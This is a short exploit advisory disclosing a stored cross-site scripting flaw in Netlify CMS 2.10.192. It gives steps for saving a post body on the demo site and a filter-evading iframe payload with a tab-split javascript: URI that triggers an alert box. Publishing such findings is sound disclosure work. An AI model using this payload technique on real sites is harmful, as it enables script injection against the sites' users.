# Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
# Exploit Author: tmrswrr
# Vendor Homepage: https://decapcms.org/docs/intro/
# Software Link: https://github.com/decaporg/decap-cms
# Version: 2.10.192
# Tested on: https://cms-demo.netlify.com
Description:
1. Go to new post and write body field your payload:
https://cms-demo.netlify.com/#/collections/posts
Payload = <iframe src=java	sc	ript:al	ert()></iframe>
2. After save it XSS payload will executed and see alert box